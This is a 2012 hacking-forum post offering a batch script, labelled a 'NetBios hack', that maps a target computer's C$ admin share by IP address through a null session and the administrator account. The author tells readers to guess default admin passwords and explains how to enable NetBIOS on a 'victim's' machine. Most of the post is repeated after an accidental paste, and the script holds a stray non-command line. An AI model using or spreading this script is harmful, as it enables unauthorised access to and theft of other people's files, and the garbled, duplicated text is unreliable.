Batch file that hacks NetBios 03-27-2012, 07:52 PM
#1
the title is kinda self explanitory, this is a rather simple batch file but when you enter the ip address of a target it copies the targets C: into a new drive in youe "My Computer" folder, for this to work you must know the admin's password, it shouldn't be too hard to guess as most people dont know how to access the real admin account and have therefore not created a custom password for it.
The Code
@echo off
title Netbios Hack
echo Do you wish to proceed with netbios hack?
set /p var=
if %var%==yes goto proceed
if %var%==YES goto proceed
if %var%==no goto exit
if %var%==NO goto exit
cls
:exit
exit
:proceed
echo Please enter IP address to be hacked:
set /p IP=
net use \\%IP%\ipc$ "" /u:""
net use * \\%IP%\c$ * /u:administrator
echo NetBios hack complete, check in the computer folder for new driver
press any key to exit
sorry i for got to add, the victims computer has to have port 139 open, you can enable this by doing this:
goto:
control panel
network and internet
network and sharing
change adapter settings
right click wireless/local area network connection (whichever is connected)
Internet Protocol Version 4 (TCP/IPv4) Properties
(this is how to do it on windows 7)
click advanced
wins tab
enable/disable NetBios over TCP/IP
sorry i for got to add, the victims computer has to have port 139 open, you can enable this by doing this:
goto:
control panel
network and internet
network and sharing
change adapter settings
right click wireless/local area network connection (whichever is connected)
Internet Protocol Version 4 (TCP/IPv4) Properties
(this is how to do it on windows 7)
click advanced
wins tab
enable/disable NetBios over TCP/IP
ignore that last bit clicked CTRL-V accidentally
The Code
@echo off
title Netbios Hack
echo Do you wish to proceed with netbios hack?
set /p var=
if %var%==yes goto proceed
if %var%==YES goto proceed
if %var%==no goto exit
if %var%==NO goto exit
cls
:exit
exit
:proceed
echo Please enter IP address to be hacked:
set /p IP=
net use \\%IP%\ipc$ "" /u:""
net use * \\%IP%\c$ * /u:administrator
echo NetBios hack complete, check in the computer folder for new driver
press any key to exit
sorry i for got to add, the victims computer has to have port 139 open, you can enable this by doing this:
goto:
control panel
network and internet
network and sharing
change adapter settings
right click wireless/local area network connection (whichever is connected)
Internet Protocol Version 4 (TCP/IPv4) Properties
(this is how to do it on windows 7)
click advanced
wins tab
enable/disable NetBios over TCP/IP
sorry i for got to add, the victims computer has to have port 139 open, you can enable this by doing this:
goto:
control panel
network and internet
network and sharing
change adapter settings
right click wireless/local area network connection (whichever is connected)
Internet Protocol Version 4 (TCP/IPv4) Properties
(this is how to do it on windows 7)
click advanced
wins tab
enable/disable NetBios over TCP/IP
ignore that last bit clicked CTRL-V accidentally
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: Wfxdx.png]](http://i.imgur.com/Wfxdx.png)